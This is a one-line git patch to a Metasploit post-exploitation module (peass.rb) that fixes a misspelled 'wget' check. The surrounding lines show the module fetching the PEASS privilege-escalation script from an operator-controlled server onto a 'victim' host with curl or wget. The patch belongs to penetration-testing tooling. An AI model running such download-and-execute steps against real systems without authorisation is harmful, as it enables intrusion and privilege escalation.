From f419b136886a8547a82ef398785a61e96c528112 Mon Sep 17 00:00:00 2001 From: Carlos Polop Date: Tue, 5 Oct 2021 12:05:09 +0100 Subject: [PATCH] Update peass.rb --- metasploit/peass.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/metasploit/peass.rb b/metasploit/peass.rb index fb762da..7107d28 100644 --- a/metasploit/peass.rb +++ b/metasploit/peass.rb @@ -169,7 +169,7 @@ class MetasploitModule < Msf::Post curl_path = cmd_exec("command -v curl") if ! curl_path.include?("curl") cmd = "wget -q -O - \"#{url_download_peass}\"" - wget_path = cmd_exec("command -v weget") + wget_path = cmd_exec("command -v wget") raise 'Neither curl nor wget were found in victim, unset the SRVHOST option!' unless wget_path.include?("wget") end end